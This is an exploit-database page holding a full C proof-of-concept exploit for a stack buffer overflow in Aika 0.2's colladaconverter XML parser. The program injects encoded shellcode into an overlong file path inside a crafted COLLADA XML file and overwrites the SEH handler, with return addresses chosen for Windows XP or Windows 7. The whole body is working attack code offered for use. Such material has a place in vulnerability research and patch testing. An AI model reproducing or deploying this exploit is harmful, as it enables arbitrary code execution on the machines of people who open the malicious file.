Aika 0.2 colladaconverter Xml Parsing Buffer Overflow



EKU-ID: 957 CVE: OSVDB-ID:
Author: isciurus Published: 2011-09-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
 # Exploit Title: Aika colladaconverter buffer overflow exploit
 # Date: 09/11/2011
 # Author: isciurus
 # Software Link: http://aika.googlecode.com/files/aika-v02.zip
 # Version: 0.2
 # Tested on: Windows 7 x64
 
    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
 
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
 
    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/gpl-3.0.html>.
 
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
*/

#include <stdio.h>
#include <windows.h>
#include <stdlib.h>
#include "string.h"

char printableASCIIShellcode[] =  // encoded 499 bytes
 "WUQQUj3hKzJYSaRYjVCX4VGRH4z0BfXRQPPZjQX4QP2BM0BMX2Ai0BMXYZPOCKHG" // will be injected inside the file path ---------
 "OHOCHGCKHKkAgFCBMGKJEA3Ag2Bg0BgABE94ku2QmAiAszHthbzMIMQ8Uz9TFQWC" //                                                |
 "GDNW6jYeJ8l47kSCPlKPRZljwLskRH6RQ0OiKjRENz4TUYHTfu6rjMTi1NAjGwMF" //                                                |
 "RHxIjxgzoZnVXlGIXJbCJYhxKHXKvjyFXDDLbNydxzXT3vTJdfa7Hpp3VM1jUOVv" //                                                |
 "UJYuPT3vkOQIPYGxa6Rk6NOaV9PEH56Mrrz5ZSPLOAvKIsFOCbfqWBRXPCNWSmJf" //                                                |
 "EVCXNoYNR9oDOaWoykz1Ev3TxcSHQz4ZOOLxlGBjsDGWGJs1EOCNqaAAOWHAMWCx" //                                                |
 "JEFIrTQ70vEFELaCIPPAPP0GUSmGfq1ZioUNQQATGCISZuJHNKRnlC3baNSAvIRO" //                                                |
 "HLvt4zVFHLkLxBQR5XsKpEN90RgdBZlNmISLELGsEL0myBVKzJY";             //                                                |
                                                                       //                                                |
char xml[] =                                                           //                                                |
 "<?xml version=\"1.0\" encoding=\"utf8\"?>"                        //                                                |
 "<COLLADA xmlns=\"http://www.collada.org/2005/11/COLLADASchema\" version=\"1.4.1\">" //                              |
    "<asset>"                                                                            //                              |
    "    <contributor>"                                                                  //                              |
    "        <author>isciurus</author>"                                                  //                              |
    "        <comments>The shellcode encoded with http://www.exploit-db.com/exploits/13286/</comments>" //               |
    "    </contributor>"                                                                 //                              |
    "    <created>2011-09-04T22:29:59Z</created>"                                        //                              |
    "    <modified>2011-09-04T22:29:59Z</modified>"                                      //                              |
    "    <unit meter=\"0.01\" name=\"centimeter\"/>"                                     //                              |
    "    <up_axis>Y_UP</up_axis>"                                                        //                              |
    "</asset>"                                                                           //                              |
    "<library_cameras>"                                                                  //                              |
    "    <camera id=\"cameraShape1\" name=\"cameraShape1\">"                             //                              |
    "        <optics>"                                                                   //                              |
    "            <technique_common>"                                                     //                              |
    "                <perspective>"                                                      //                              |
    "                    <yfov>37.8492</yfov>"                                           //                              |
    "                    <aspect_ratio>1.5</aspect_ratio>"                               //                              |
    "                    <znear>1</znear>"                                               //                              |
    "                    <zfar>10000</zfar>"                                             //                              |
    "                </perspective>"                                                     //                              |
    "            </technique_common>"                                                    //                              |
    "        </optics>"                                                                  //                              |
    "    </camera>"                                                                      //                              |
    "</library_cameras>"                                                                 //                              |
    "<library_lights></library_lights>"                                                  //                              |
    "<library_images>"                                                                   //                              |
    "    <image id=\"file2\" name=\"file2\" depth=\"1\">"                                //                              |
    "        <init_from>E:\\aika\\"                                                      //  <---------------------------
 "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
    "SSSSSSSSSSSSSSADDR_1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 //             ^
 //             |
 //              ------------------------------------------------- the shellcode will be copied at this address
    "AAAAA"
 "  </init_from>"
    "    </image>"
 " <image id=\"file3\" name=\"file3\" depth=\"1\">"
    "        <init_from>E:\\aika\\"
 "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
 "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
 "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
 "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
 "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
 "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
 "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
 "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
 "BBBBBBBBADDR_2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 //       ^
 //       |
 //        -------------------------------------------------------- these bytes will overwrite SEH handler
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" // this part forces the application to write outside       
 "AAAAAAAAAAAAAAAAAAAA"                                           // the stack and triggers AV exception  
 "  </init_from>"
    "    </image>"
    "</library_images>"
    "<library_materials>"
    "    <material id=\"blinn3\" name=\"blinn3\">"
    "        <instance_effect url=\"#blinn3-fx\"/>"
    "    </material>"
    "</library_materials>"
    "<library_geometries>"
    "    <geometry id=\"LOD3spShape-lib\" name=\"LOD3spShape\">"
    "        <mesh>"
    "            <source id=\"LOD3spShape-lib-positions\" name=\"position\">"
    "                <technique_common>"
    "                    <accessor count=\"2108\" offset=\"0\" source=\"#LOD3spShape-lib-positions-array\" stride=\"3\">"
    "                        <param name=\"X\" type=\"float\"/>"
    "                        <param name=\"Y\" type=\"float\"/>"
    "                        <param name=\"Z\" type=\"float\"/>"
    "                    </accessor>"
    "                </technique_common>"
    "            </source>"
    "            <source id=\"LOD3spShape-lib-normals\" name=\"normal\">"
    "                <technique_common>"
    "                    <accessor count=\"2290\" offset=\"0\" source=\"#LOD3spShape-lib-normals-array\" stride=\"3\">"
    "                        <param name=\"X\" type=\"float\"/>"
    "                        <param name=\"Y\" type=\"float\"/>"
    "                        <param name=\"Z\" type=\"float\"/>"
    "                    </accessor>"
    "                </technique_common>"
    "            </source>"
    "            <source id=\"LOD3spShape-lib-map1\" name=\"map1\">"
    "                <technique_common>"
    "                    <accessor count=\"2277\" offset=\"0\" source=\"#LOD3spShape-lib-map1-array\" stride=\"2\">"
    "                        <param name=\"S\" type=\"float\"/>"
    "                        <param name=\"T\" type=\"float\"/>"
    "                    </accessor>"
    "                </technique_common>"
    "            </source>"
    "            <vertices id=\"LOD3spShape-lib-vertices\">"
    "                <input semantic=\"POSITION\" source=\"#LOD3spShape-lib-positions\"/>"
    "            </vertices>"
    "            <triangles count=\"4212\" material=\"blinn3SG\">"
    "                <input offset=\"0\" semantic=\"VERTEX\" source=\"#LOD3spShape-lib-vertices\"/>"
    "                <input offset=\"1\" semantic=\"NORMAL\" source=\"#LOD3spShape-lib-normals\"/>"
    "                <input offset=\"2\" semantic=\"TEXCOORD\" source=\"#LOD3spShape-lib-map1\" set=\"0\"/>"
    "                <p>375</p>"
    "            </triangles>"
    "        </mesh>"
    "    </geometry>"
    "</library_geometries>"
    "<scene>"
    "    <instance_visual_scene url=\"#VisualSceneNode\"/>"
    "</scene>"
 "</COLLADA>";

int main(int argc, char **argv)
{
 FILE *xml_file;
 char win7;
 char *offset;
 char *ll;

 if(argc < 2)
 {
  printf("\nUsage: aika_bof <malformed_collada_xml_path>");
  return 0;
 }

 if(sizeof(printableASCIIShellcode) > 644)
 {
  printf("\nSorry, the shellcode is too long, 644 chars is maximum");
  return 0;
 }
 
 while(1)
 {
  char os;

  printf("\nChoose OS version ([X] for Windows XP, [7] for Windows 7):");
  os = tolower(getchar());
  
  if(os == 'x')
  {
   win7 = 0;
   break;
  }
  else if(os == '7')
  {
   win7 = 1;
   break;
  }
  else
  {
   printf("\nUnknown OS version");
  }
 }

 printf("\n[*] Injecting the shellcode into the xml...");

 offset = strstr(xml, "SSSSSSSSSSSSSSSSSSSSSSSSSSSS");
 strncpy(offset, printableASCIIShellcode, sizeof(printableASCIIShellcode) - 1);
 
 if(win7 == 1)
 {
  offset = strstr(xml, "ADDR_1");
  strncpy(offset, "%40%02", sizeof("%40%02") -1);
  offset = strstr(xml, "ADDR_2");
  strncpy(offset, "%40%02", sizeof("%40%02") -1);
 }
 else
 {
  offset = strstr(xml, "ADDR_1");
  strncpy(offset, "%40%01", sizeof("%40%01") -1);
  offset = strstr(xml, "ADDR_2");
  strncpy(offset, "%40%01", sizeof("%40%01") -1);
 }

 printf("done");

 printf("\n[*] Writing %d bytes to %s...", sizeof(xml), argv[1]);
 
 xml_file = fopen(argv[1], "wb");
 if(xml_file == NULL)
 {
  printf("\nerror while opening %s", argv[1]);
  return 0;
 }
 
 if(fwrite(xml, 1, sizeof(xml) - 1, xml_file) != sizeof(xml) - 1)
 {
  printf("\nerror while writing into %s", argv[1]);
  return 0;
 }

 printf("done"); 
}